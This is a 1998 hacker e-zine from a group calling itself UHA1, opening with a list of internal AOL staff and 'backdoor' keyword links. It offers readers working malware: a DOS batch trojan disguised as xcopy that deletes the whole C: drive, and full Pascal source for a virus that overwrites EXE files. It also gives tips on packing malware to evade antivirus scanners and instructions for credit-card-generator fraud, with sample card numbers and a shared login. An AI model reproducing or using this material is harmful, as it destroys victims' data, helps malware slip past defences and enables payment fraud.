aol://4344:1186.guide.3682978.488405094 Guide Conf Room: aol://4344:1186.ConfRms.3685342.498065107 Guide Libaries: aol://4344:1186.ResLib.3685341.498053484 ARC: aol://4344:666.arcform.860809.504463074 Community Center: aol://4344:1186.comcen.3683158.490570698 Rainman Cmds: aol://4344:1.rmc.70682.473023645 S&S Policy: aol://4344:223.pnp.91463.482279948 Special Acnts: aol://4344:223.specacct.89721.481584812 Search Stuff aol://4344:204.z66proj2.1845884.505890733 OH account aol://4344:20.oh1te.92384.497065962 About Special Affinity/Account Groups aol://4344:223.affingrp.89731.481585326 CNN aol://4344:223.cnn.89754.481594657 DEMO Accounts aol://4344:223.demo.89755.481594657 Special Account Descriptions aol://4344:223.specacct.89721.481584812 April Promo Codes aol://4344:223.aprilpr.96692.512240264 Promotion Codes aol://4344:223.promocd.6558384.500850050 Marketing Info aol://4344:223.markting.6558102.500754022 Did You Know??? aol://4344:223.helpdocs.84876.494254534 Guide Program aol://4344:1186.guide.3682978.488405094 Conference Room Backdoors aol://4344:243.mainconf.5964915.500442609 Info on The Americaonline Service aol://4344:666.userinfo.860961.505079464 Host/IP list aol://4344:204.rslists.67146.468717561 Visual Publisher for WIndows aol://4344:1.vis_pubw.72126.491927210 Vogel Verlag aol://2719:3-524 TV Today Chat aol://2719:3-602 Legal Pad aol://2719:3-599 In The Soup aol://2719:3-600 Index by Forum Name aol://4344:204.cdinf.79776.495161900 Canadian Software aol://4344:223.canad2.6602532.512279521 Examine Object Information aol://4344:204.examine1.71162.473812954 VLA Adam's Private Area aol://4344:204.a37area.6616266.517541277 VirtuaLeader Academy's VirtuaLab aol://4344:204.vlalab$$.68347.469068066 Search America Online (Everywhere) aol://4344:683.vlasrch.6164889.505527591 VLA Private Area Backlink aol://4344:204.vlapage.6567454.503558406 Top Secrets aol://4344:409.secrets.6553845.498835541 In the Sand - XXX aol://4344:613.sand.3475361.491812962 Computing Channel Internet aol://4344:1454.comp_cha.3407965.483568458 WebRequest aol://1391:40-31999 AOL pointers newstand aol://4344:559.newslet.4129994.494194276 Forms: aol://4344:1.formscat.71914.474386750 TLA app aol://4344:20.tlaapp1.125506.492637725 Shower Scene aol://4344:613.shower.3475360.491812517 AOL 1.5 - Access aol://4344:226.llIl.2755674.520114429 Security code: 3675 Boo Boo Pic oob oob AOL - Nutzer 100000 Changes Color of Chat Room color Secret Area TYGER In the Sand 20.aol://4344:613.sand.3475361.491812962 Shaggy Pic yggahs Yogi Pic igoy AOL Resource Center Message Boards aol://5863:126/mB:51014 APPLY TO BE A BETA TESTER aol://1722:beta%20apply Remote Staff Lounge aol://4344:1165.stafflng.3349013.515879444 Josie Pic eisoj Papa Smurf Pic frumsapap Secret Staff Access aol://1722:gstaff Nipples Aweigh aol://4344:773.HOTNIP1.6843825.521317437 Entertainment Promo aol://4344:754.entspot.6684982.499022815 Barney is a Nazi aol://4344:1165.barney.3353269.522706580 Programming Area Teenz -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 13. Trojaning by the file ripper tfr@gmx.net May 30, 1998 What is trojaning ? Remember the story with the city trojan ? The greeks couldn't defeat the trojans, so they used a trick. The greeks gave the trojans a present. A wooden horse and the belly was hollow. In the empty belly the put in the best warrios. The silly trojans take the horse into their city and they celebrate the victory. After all trojans are drunken the warrios came out, and so they defeated finally the trojans ... by the way : The horse was later on called the "trojan horse"... In the Computerworld it's exactly the same. A *evil* program is hidden in an helpful programm. For what is trojaning used ?? Let's see ... ;) I just told you the greeks defeated with this trojan horse the trojans ... now what do you think for what are this little programmz used ?? For gaining access ... Let's say you give a trojan to an sysadmin and he runs the programm from his admin-account, so the programm is able to access more things than you as a normal user. Let's say you want to change the password of the admin ... with a trojan you can make it! The only problem is, that trojaning (mostly) only works in systems like Novell or Win/Dos/Unix-based systems. How do I trojan a system ?? In Dos (=Disk owning system ;) you can easily make a trojan by using script files. In Dos script files are called Batch. It's like you give in commands in the Dos, but you don't have to type every single command in... oh yeah ... the extention for Batchfiles is .BAT example : if you type in in DOS : DIR then something like this appears (sorry all in german;) : Datentr„ger in Laufwerk D: TFR Seriennummer des Datentr„gers: 1234-1234 Verzeichnis von T:\TFR\TFR . 05-30-98 1:31a . .. 05-30-98 1:31a .. 1 TXT 40,545 05-30-98 1:31a 1.txt BATCH BAT 3,459 05-30-98 1:31a batch.bat 3 TXT 1,231,230 05-30-98 1:31a a.txt 3 Datei(en) 1,274,134 Bytes 2 Verzeichnis(se) 110,562,366,976 Bytes frei that means : BATCH BAT 3,459 05-30-98 1:31a bAtCh.BaT | | | | | | | | | | | |- Win95 Name | | | | |- Creation time | | | |- Creation date | | |-Filesize (=3 KB and 459 bytes ...) | |-Extention |-First Name ;) if you want to run this file, just type in BATCH (note : don't type in ;) Ok, now I show you how I programmed my first trojan : first change into the system-dir by typing in "cd ". In MS-Dos systems the system-dir is noramlly C:\dos\, in windows-based systems c:\windows\command\ then start the editor by typing in "edit xcopy.bat" ok, now type in the following commands (note : don't write the things marked with ";") @echo off ;hide all commands copy %1 %2 ;do the helpful part deltree C: /y ;kill C:, every file ... That's it. Oh yeah. Now exit the editor and enter the following command : "del xcopy.exe". Ok, now you installed the trojan. When someone is now running xcopy it will work correctly, but after he reboots the system is empty...;) I used this little programm on a computersystem with more than 20 computers ... every single computer was killed ;) If the system is compress with Drivespace or Doublespace it's easier. Just type change "deltree C: /y" to "deltree h: /Y" ... In Drivespace/Doublespace the real partition is saved on the Drive H: If you work on C:, before you start a file the file will be decompressed from drive H:. If you delete H: (note : msdos won't let you format this drive!) all is away ... even the partition is away ;). That means not even the best recovery programm can recover the programmz... That was one of the easy ways. On every system, there is a big diffrence how to trojan it. I don't want to show you more of my trojans because I noticed if I write many possiblities the dudes reading it, get lazy and only copy my trojans. And I think you should be able to write your own. There are no limits. You can use about every program to make it. I programmed some in Pascal. Not because it's fast or something like this. But I programmed about 4 years in Pascal and I'm able to make about every programm in it ;)... so I like this language best. C++ is also great, but I hadn't enough time latly to check out all commands... But if you want to programm really professional Trojans use Assembler (ASM) it's the only real programming language! Only to activate your brain : In Novell you can change your password by typing in a command - I cann't remember well, but I think it was "setpass " (or something like this). Hope you got now some new ideas and show the admins who rules ;) Some words : - If you mail me, please write short messages. I mostly have not much time and if I get a message that is short I can answer more message in the same time! Oh yeah, if you don't get a message soon, don't get mad, if you don't receive a reply message within 2 weeks mail me again! (tfr@gmx.net) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 14. Programming Virii by the file ripper tfr@gmx.net May 30, 1998 Before I start talking about programming Virii, what is an Virus ? (Note : Virii is the pluralform from Virus ;) And virus is an program, that repoduce itselfs by copying his code onto a normal file, so the virus can spread hisself over the whole harddisk. Normally this causes problems. In many cases the Virus has also some evil functions implanted, like formating the harddisk on the 1st of April or some other jokes. To become a good virus programm you need to know well Assembler. If I talk about programming Virii, I don't mean getting a virus-creation set and saying the computer what the virus should do and the creation set will do all the programming work for you... that's really lame. These Virus are easier to detect, then a elephant in a house made of glass ;). But there are also some tricks to make your virus undetectable by any Virusscanner, they keyword is "polymorph", that means everytime the virus infects a new file, his code changes, the virus programms itselfs new... (one of the difficult ways). But over the time I found a way how to make even Virii like Jerusalem.Standard undetectable, but I will describe this later on in my text. First, choose the programming language you know best. In my case it's Pascal (language between Basic and C++) The second step, is thinking of how the Virus repoduce itselfs. There are many possiblities. The easiest one is "overwritting", that means everytime the virus infects the file, the virus replaces all the code of the programm with itselfs. But this is very conspicuous, so the some programmer developed some other methode like adding ... (means, that the virus don't changes anything on the Programm, the Programm is runable, evertime the programm is started the virus is loaded in the Memory and infects every programm, that the user run.). But this one is also a bit conspicuous, because the filesize changes. Again some programmers had a better idea. Normally in FAT16 (MSDOS) every file you create needs from the beginning 16KB - 32KB (because of the blocks). That means if you created a file and only type in 1 single letter, you waste about 16-32KB. And Virii use this slack (it's called like this) for there code. There are even Virii out there, that do "steahling". That means if they are in memory not even virusscanners are able to detect them. Even if you do "dir" and the virus is in memory the filesize hasn't change. But if the virus is not in the memory mostly the filesize has changed, so this is also one of the complicated variants, because you need much informations about MSDOS systems and how the work (vectors,interrupts...). In my case I take the easiest on ... Overwritting. Ok. The next step is programming ;) -- BEGIN of VIRUS.PAS -- {$M 8192,0,0} USES Dos; VAR Command : STRING[79]; R:STRING; PROCEDURE Infect; VAR A,F:FILE; NumRead, NumWritten: Word; Buf: array[1..2048] of Char; BEGIN Assign(F,Command+'.EXE'); {$I-} Reset(F,1); {check if file exists} {$I+} IF IoResult=0 THEN BEGIN ReWrite(F,1); {overwrite file, which just started} Assign(A, Paramstr(0)); Reset(A,1); {filepointer=0, where the virus is saved} REPEAT {copy the code} BlockRead(A, Buf, SizeOf(Buf), NumRead); BlockWrite(F, Buf, NumRead, NumWritten); UNTIL (NumRead = 0) OR (NumWritten <> NumRead); Close(A); Close(F); END; END; BEGIN {MAIN Procedure} REPEAT GetDir(0,R); Write(r,'>'); {write the dir} Readln(Command); IF Command<>'' THEN BEGIN SwapVectors; Exec(GetEnv('COMSPEC'), '/C '+Command); SwapVectors; Infect; {Infect the file} IF DosError <> 0 THEN Writeln('Could not execute COMMAND.COM'); END; Writeln; UNTIL 1=2; {endless loop} END. -- END of VIRUS.PAS -- Yeah, I only built in the important informations. Normally you can also build in some things like after 10 commands it writes "fuck you" or formats your harddisk, and stuff like this. But VIRUS.PAS is harmless, after it was started it is resistent (it creats a new dos-shell) and every file that is started, which is an exe-file will get infected. You only have to compile VIRUS.PAS with the pascal-compiler (tpc), after that the file should have a size of exactly 4,460 KBytes. But the Virus is a bit big. You can make the file smaller by using Pklite. PkLite also can be used to make normal Virii, that are detectable by nearly every Virusscanner, undetectable. Because many Virusscaner search for special strings in the Virus-code, you can make the Virus undetectable by compressing it with programms like PkLite or some File-Protection Programz. That's it ... I hope you enjoyed the text, if you liked it, write me some comments to : tfr@gmx.net -thanx-. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 15. XXX/Porno by the file ripper tfr@gmx.net May 30, 1998 Because I get every day many mails, only asking for XXX passwords, I decided to add this little section to this magazine. First of all ... I know many are ONLY interessted in stuff like this, they learn hacking ONLY for gaining access to XXX/Porno, but this guys are LAMERZ. Hacking is for gaining informations, not for sexual arouse!!! PLEASE DON'T MAIL ME IF THIS TECHNIQUE WRITTEN HERE DON'T WORKS! I DON'T GIVE ANY SUPPORT ON THIS CRAP! There are 3 possiblities. * Here are some free sites : http://www.freeporn.com http://www.hardporn.com (you don't even have to tell your creditcardnumber...no age verification!) every week new pix * XXX/Porno archive : http://www.knoflach.com/sex username : sex password : sex about 1,6 Gb of pictures, videos... the server is only up, when a friend of mine is online, so try often. I think he normally goes online about 0900 pm GMT. * Hacking ;) I don't called it hacking, but it's something like that ;). First get a CreditCard (CC) generator. You can download one at ftp.uha1.com/pub/credit/creditw.zip or if you need fast some numbers here are some : Discover Card : 6011 0078 8614 3428 Mastercard : 5318 8459 3741 8709 Visa : 4013 345 617 301 American Express : 3047 000672 87662 Note : The first 4 digits are the bank id number. Visa numbers can have 13 or 16 digits. Discover Card - numbers have to begin with 60110. Ok. Now go to the Registration Page of that sucking Porno Page and register yourself. Don't use your real name. Be creative and invent and Name that sounds like it's real ;). Fill out all informations, you also have to fill out the CreditCard information (note : don't use the number standing on your own CreditCard ;). Some old servers don't check if the creditcard is valid, they check if the creditcard is valid build ... that means they ONLY check if the creditcard is looking like a real one. That's it. Normally the Software tells you that you can know login with username and password you entered before or some shit like that. Ok, I hope you awesome guys are now lucky! I only wrote this text about it, because I get many request on that and I'm not interessted in writting crap like this every day! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- If you think you are good enough than you can join UHA1, for this email us : uha1@gmx.net. Also look onto http://www.uha1.com into the join-section! We are also interessted in alliances with other Hacking Groups. Greetings to my br0's at gHF and all members (more than 120!) of UHA1. Remember : you can rule the world only by knowing the key. -=[ United Hacker Association 1 ]=- Email : uha1@gmx.net Homepage : http://www.uha1.com (after the uha there is a ONE!) ICQ UIN : #7010064 (the file ripper) or #7500553 (Controlio) ************************************ EOF ************************************